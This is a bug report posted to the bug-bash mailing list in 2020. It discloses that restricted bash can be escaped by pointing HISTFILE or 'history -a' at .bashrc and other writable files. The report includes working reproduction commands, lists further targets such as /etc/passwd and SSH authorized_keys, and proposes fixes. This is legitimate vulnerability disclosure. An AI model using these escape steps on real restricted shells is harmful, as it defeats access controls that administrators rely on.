bug-bash
[Top][All Lists]
Advanced

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Potential restricted bash escape by modifying history file


From: Diffie
Subject: Potential restricted bash escape by modifying history file
Date: Thu, 30 Apr 2020 14:22:31 -0400
User-agent: Cyrus-JMAP/3.3.0-dev0-351-g9981f4f-fmstable-20200421v1

Configuration Information [Automatically generated, do not change]:
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O2 -g -pipe -Wall -Werror=format-security 
-Wp,-D_FORTIFY_SOURCE=2 -Wp,-D_GLIBCXX_ASSERTIONS -fexceptions 
-fstack-protector-strong -grecord-gcc-switches 
-specs=/usr/lib/rpm/redhat/redhat-hardened-cc1 
-specs=/usr/lib/rpm/redhat/redhat-annobin-cc1 -m64 -mtune=generic 
-fasynchronous-unwind-tables -fstack-clash-protection -fcf-protection 
-Wno-parentheses -Wno-format-security
uname output: Linux host 5.5.17-200.fc31.x86_64 #1 SMP Mon Apr 13 15:29:42 UTC 
2020 x86_64 x86_64 x86_64 GNU/Linux
Machine Type: x86_64-redhat-linux-gnu

Bash Version: 5.0
Patch Level: 11
Release Status: release

*Description:*
It is possible to write/append arbitrary content to files from a restricted 
bash shell (with the privileges of the current user context) by tweaking the 
HISTFILE variable, or by specifying a filename to "history -[a][w]". This does 
not necessarily lead to a restriction bypass in all configurations, but does in 
a few that come to mind:

* If the user can write to their home directory they can append arbitrary code 
to .bashrc/other shell files. These shell files will execute the code without 
restrictions on subsequent runs of rbash (assuming rbash is not being run in 
posix mode, and that --norc is not being passed)
* If the user is root they can trivially get an unrestricted shell by modifying 
/etc/passwd, etc.
* If the cwd contains an executable script that the user can write to, they can 
append to the script with arbitrary code, then invoke this code from rbash: 
"hash -p executable_script mal_command ; mal_command" (this could be possible 
with an executable binary too, although would be a little more complex)
* SSH authorized keys, various other configs.
* etc...

Again, it will depend on the configuration, but this seems exploitable in most 
configurations of rbash (one where it may be more difficult to exploit is when 
the user is placed into a non-home directory chroot where they have limited 
write access).


*Repeat-By:*
[UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r
[__RESTRICTED] bash-5.0$ export HISTFILE=$HOME/.bashrc
[__RESTRICTED] bash-5.0$ history -c
[__RESTRICTED] bash-5.0$ /usr/bin/whoami
[__RESTRICTED] bash: /usr/bin/whoami: restricted: cannot specify `/' in command 
names
[__RESTRICTED] bash-5.0$ history -a
[__RESTRICTED] bash-5.0$ exit

[UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r
diffie # whoami inserted into .bashrc above
[__RESTRICTED] bash-5.0$

OR without using HISTFILE variable

[UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r
[__RESTRICTED] bash-5.0$ history -a $HOME/.bashrc '
> /usr/bin/whoami
> '
[__RESTRICTED] bash-5.0$ exit

[UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r
diffie
[__RESTRICTED] bash-5.0$


*Fix:
*
* Disable writing to a specific file in rbash with "history -[a][w] 
/tmp/bad_file bad_command" and make HISTFILE readonly. May be some other edge 
cases here.
* Disable history in rbash altogether.


reply via email to

[Prev in Thread] Current Thread [Next in Thread]